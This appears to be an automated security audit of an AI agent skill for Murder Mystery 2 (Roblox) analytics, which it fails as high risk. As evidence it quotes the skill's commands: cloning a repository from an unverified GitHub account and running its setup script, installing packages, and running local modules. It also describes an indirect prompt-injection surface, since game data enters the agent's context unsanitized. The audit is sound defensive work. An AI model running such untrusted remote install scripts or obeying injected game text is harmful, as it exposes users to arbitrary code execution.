mm2-roblox-analytics-toolkit
Fail
Audited by Gen Agent Trust Hub on Oct 1, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONINDIRECT_PROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill instructs the agent to clone a repository from an unverified GitHub user and execute a shell script with installation flags, a pattern that enables arbitrary code execution from remote sources.
- Evidence:
git clone https://github.com/8015238355/mm2-analytics-dashboard-2026.gitfollowed by./setup.sh --install. - [EXTERNAL_DOWNLOADS]: The skill initiates package manager installations for both Node.js and Python from the cloned repository, which is hosted by an untrusted third party.
- Evidence:
npm installandpython3 -m pip install -r requirements.txt. - [COMMAND_EXECUTION]: The skill frequently invokes local shell commands to run analytics and strategy modules, increasing the operational risk if the underlying scripts are malicious.
- Evidence: Use of
python3 main.pywith various modes includinganalytics,inventory, andlive. - [INDIRECT_PROMPT_INJECTION]: The skill processes Murder Mystery 2 inventory and gameplay data without explicit sanitization, creating an attack surface where malicious text in the game data could influence agent behavior.
- Ingestion points: The skill reads data via
InventoryManager.scan_inventory(),AnalyticsDashboard.load_data(), and profile YAML configurations. - Boundary markers: No delimiters or protective instructions are used when interpolating this external data into the analysis context.
- Capability inventory: The skill has the ability to write files (
inventory.export) and execute shell commands (main.py). - Sanitization: No data validation or escaping mechanisms are described for handling potentially untrusted game strings.
Recommendations
- AI detected serious security threats
Audit Metadata